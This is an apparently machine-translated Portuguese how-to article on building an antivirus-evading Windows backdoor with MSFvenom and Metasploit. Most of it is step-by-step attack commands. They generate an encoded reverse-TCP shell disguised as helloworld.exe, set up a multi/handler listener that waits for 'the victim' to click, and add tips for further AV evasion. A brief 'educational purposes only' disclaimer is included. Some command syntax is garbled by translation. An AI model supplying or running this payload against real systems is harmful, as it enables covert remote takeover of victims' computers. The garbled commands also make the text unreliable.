Como criar um backdoor quase indetectável usando MSFvenom no Kali Linux?

Digite msfvenom -l encoders para mostrar a lista de codificadores
Digite msfvenom -l encoders para mostrar a lista de codificadores.

Um backdoor é usado para contornar os mecanismos de segurança, muitas vezes secretamente e, na maioria das vezes, de forma indetectável. Usando o MSFvenom, a combinação de msfpayload e msfencode, é possível criar uma porta dos fundos que se conecta de volta ao invasor usando TCP de shell reverso. Para desenvolver um backdoor, você precisa alterar a assinatura do seu malware para escapar de qualquer software antivírus. Conclua este projeto em um par de computadores que você tem permissão para acessar e, no processo, você aprenderá mais sobre segurança de computador e como esse tipo de backdoor funciona.

Passos

  1. 1
    Inicie o kali e ative o console do terminal.
  2. 2
    Digite ifconfigpara exibir a interface e verificar seu endereço IP.
  3. 3
    Digite msfvenom -l encoderspara mostrar a lista de codificadores.
    • Você usará x86/shikata_ga_naicomo codificador.
  4. 4
    Digite "msfvenom -a x86 - plataforma windows -p windows / shell / reverse_tcp LHOST = 192,168.48,129 lport = 4444 -b" \ x00 "-e x86 / shikata_ga_nai -f exe> helloworld.exe
    • -a x86 - platform windows designa a arquitetura a ser usada.
    • -p windows/shell/reverse_tcp designa as cargas úteis a serem incorporadas.
    • LHOSTdesigna o endereço IP do ouvinte.
    • LPORT designa a porta do ouvinte.
    • -b "\x00"designa para evitar caracteres inválidos (bytes nulos).
    • -e x86/shikata_ga_nai designa o nome do codificador.
    • -f exe > helloWorld.exe designa saída de formato.
  5. 5
    Digite msfconsolepara ativar o metasploit.
    • Agora você gerou sua porta dos fundos. Quando a vítima clica em helloWorld.exe, a carga útil do shell embutida será ativada e fará uma conexão de volta ao seu sistema. Para receber a conexão, você deve abrir o multi-handler no Metasploit e definir as cargas úteis.
  6. 6
    Digite use exploit/multi/handler.
  7. 7
    Digite set payload windows/shell/reverse_tcp.
  8. 8
    Digite show optionspara verificar o módulo.
  9. 9
    Digite set LHOST 192,168.48,129.
    • "LHOST" designa o endereço IP do ouvinte.
  10. 10
    Digite set LPORT 4444.
    • "LPORT" designa a porta do ouvinte.
  11. 11
    Digite rune aguarde a conexão da máquina da vítima.
  12. 12
    Aguarde até que a vítima clique em helloworld.exe. Então você será conectado com sucesso à máquina da vítima.
Digite set payload windows / shell / reverse_tcp
Digite set payload windows / shell / reverse_tcp.

Pontas

  • Usar -i <numbers> no MSFvenom representará as iterações da codificação. Às vezes, mais iterações podem ajudar a evitar o software AV.
  • Você aprendeu como gerar a porta dos fundos e codificá-la usando o MSFvenom, mas esse método não funcionará perfeitamente com alguns dos softwares AV hoje em dia. A razão por trás disso é por causa dos modelos de execução no MSFvenom. Os fornecedores de antivírus adicionaram a assinatura estática desses modelos e apenas procuram por eles. A solução para esse problema é usar um modelo de execução diferente ou ferramentas diferentes.

Avisos

  • Este artigo é apenas para fins educacionais. Hackear sem autorização ou permissão é antiético e geralmente ilegal.

Coisas que você vai precisar

  • Kali Linux
  • janelas
  • Máquina virtual
    • VirtualBox
    • VMware

Perguntas e respostas

  • O que eu faço se surgir um erro durante a criação do exploit?
    Certifique-se de que fez tudo corretamente e tente novamente. Certifique-se de que está executando o Kali Linux.

FacebookTwitterInstagramPinterestLinkedInGoogle+YoutubeRedditDribbbleBehanceGithubCodePenWhatsappEmail